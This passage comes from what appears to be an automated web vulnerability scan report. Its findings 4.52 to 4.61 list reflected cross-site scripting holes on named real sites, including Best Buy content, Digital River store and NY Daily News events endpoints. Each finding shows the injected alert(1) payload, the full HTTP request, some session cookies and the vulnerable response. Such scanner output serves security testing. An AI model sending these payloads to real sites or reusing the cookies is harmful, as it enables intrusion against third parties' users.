   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
otcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":7,"start":0,"docs":[
   {
    "nid":1841,
    "title":"Essential Tablet Accessories",
    "type":"dotcom_symlink",
    "created":"2011-07
...[SNIP]...

4.52. http://content.bestbuyon.com/solr/select/ [fl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.bestbuyon.com
Path:	/solr/select/

Issue detail

The value of the fl request parameter is copied into the HTML document as plain text between tags. The payload 3303d<script>alert(1)</script>b6529cfca94 was submitted in the fl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2482
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callba
...[SNIP]...

4.53. http://content.bestbuyon.com/solr/select/ [indent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.bestbuyon.com
Path:	/solr/select/

Issue detail

The value of the indent request parameter is copied into the HTML document as plain text between tags. The payload a4c14<script>alert(1)</script>d4c6728b788 was submitted in the indent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=ona4c14<script>alert(1)</script>d4c6728b788&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
mage,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"ona4c14<script>alert(1)</script>d4c6728b788",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":7,
...[SNIP]...

4.54. http://content.bestbuyon.com/solr/select/ [json.wrf parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.bestbuyon.com
Path:	/solr/select/

Issue detail

The value of the json.wrf request parameter is copied into the HTML document as plain text between tags. The payload 7be8e<script>alert(1)</script>cadeab2043d was submitted in the json.wrf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:25:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2631
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
"json.wrf":"bbyon.ajaxReturnTaxonometricSuccess7be8e<script>
...[SNIP]...

4.55. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.bestbuyon.com
Path:	/solr/select/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7190a<script>alert(1)</script>c544176858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess&7190a<script>alert(1)</script>c544176858a=1 HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2599
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "7190a<script>alert(1)</script>c544176858a":"1",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound
...[SNIP]...

4.56. http://content.bestbuyon.com/solr/select/ [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.bestbuyon.com
Path:	/solr/select/

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a1818<script>alert(1)</script>aed90a4ab72 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallerya1818<script>alert(1)</script>aed90a4ab72&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 756
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":1,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
ail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallerya1818<script>alert(1)</script>aed90a4ab72",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":0,"start":0,"docs":[]
}})

4.57. http://drh.img.digitalriver.com/DRHM/store [Action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://drh.img.digitalriver.com
Path:	/DRHM/store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c09'%3balert(1)//4faa26409b6 was submitted in the Action parameter. This input was echoed as f3c09';alert(1)//4faa26409b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /DRHM/store?Action=DisplayPagef3c09'%3balert(1)//4faa26409b6&SiteID=adbevlus&Locale=en_US&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet44839%27%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css
Cookie: op_refUrl=http%3A//www.fakereferrerdominator.com/referrerpathname%3Frefparname%3Drefvalue; op_browser=mozilla_1.9.2.13; op_os=windows; op_browserHigh=mozilla; RefURL=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; fcOOS=fcOptOutChip=undefined; fcC=X=C801321249&Y=1314797131799&FV=-1&H=1314797131698&Z=0&E=2283193&F=0; fcP=C=0&T=1314797131799&DTO=1314797131698&U=801321249&V=1314797131698; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//drh.img.digitalriver.com/store%3FAction%3DDisplayContentManagerStyleSheet44839%2527%253balert%281%29//c075691c24c%26SiteID%3Dadbevlus%26StyleID%3D35830700%26StyleVersion%3D17%26styleIncludeFile%3Dstyle.css; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:25:22 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=96516770448,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app71
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:25:22 GMT
Date: Wed, 31 Aug 2011 13:25:22 GMT
Content-Length: 39610
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script type="text/javascript"
...[SNIP]...
Type'],
attributes: ['platform']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayPagef3c09';alert(1)//4faa26409b6',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=adbevlus&Locale=en_US&nextAction=DisplayPagef3c09';alert(1)//4faa26409b6&StyleID=35830700&Style
...[SNIP]...

4.58. http://drh.img.digitalriver.com/store [Action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://drh.img.digitalriver.com
Path:	/store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44839'%3balert(1)//c075691c24c was submitted in the Action parameter. This input was echoed as 44839';alert(1)//c075691c24c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store?Action=DisplayContentManagerStyleSheet44839'%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://volumelicensing.adobe.com/store/adbevlus/en_US/pd/ProductID.230278700?af0f8--%3E%3Cscript%3Ealert(document.location)%3C/script%3Ebb99325cab5=1

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:16:04 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=23501754707,0)
Content-Length: 39650
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app77
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:16:04 GMT
Date: Wed, 31 Aug 2011 13:16:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script type="text/javascript"
...[SNIP]...
tes: ['platform']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayContentManagerStyleSheet44839';alert(1)//c075691c24c',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=adbevlus&Locale=en_US&nextAction=DisplayContentManagerStyleSheet44839';alert(1)//c075691c24c&St
...[SNIP]...

4.59. http://events.nydailynews.com/json [jsonsp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.nydailynews.com
Path:	/json

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload aa7d0<script>alert(1)</script>09589a620ba was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?fields=id,name,zurl&has_editors_pick=454&jsonsp=Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba&limit=3&search=true&srss=6&st=event&when=today HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 50.23.123.106
X-Runtime: 47
ETag: "ed2f54a50d5601d0052c97baa13fdce9"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www29
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; path=/; expires=Fri, 11-Nov-2011 22:35:21 GMT; HttpOnly
Content-Length: 1095

Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stomp","id":175823405,"startTime":"Thu Aug 11 20:00:00 UTC 2011","endTime":null,"zurl":"/new-york-ny/events/show/175823405-stomp"},{"name"
...[SNIP]...

4.60. http://events.nydailynews.com/json [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.nydailynews.com
Path:	/json

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 67f36<script>alert(1)</script>5a44214f354 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?fields=id,name,zurl&has_editors_pick=454&jsonsp=Zvents_load_ZventsWidget1&limit=3&search=true&srss=6&st=event67f36<script>alert(1)</script>5a44214f354&when=today HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 50.23.123.106
X-Runtime: 17
ETag: "345570b36170ce09afb9bd1922c9dc79"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www20
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; path=/; expires=Fri, 11-Nov-2011 22:35:27 GMT; HttpOnly
Content-Length: 264

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"error","msg":"Invalid search: event67f365a44214f354 is not a valid search category.","content":{"next_page":false,"identifier": "st=event67f36<script>alert(1)</script>5a44214f354&when=today&ssi=0&srss=4"}}})')

4.61. http://events.nydailynews.com/partner_json/search [image_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.nydailynews.com
Path:	/partner_json/search

Issue detail

The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload a2960<script>alert(1)</script>23d031d555e was submitted in the image_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumba2960<script>alert(1)</script>23d031d555e&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
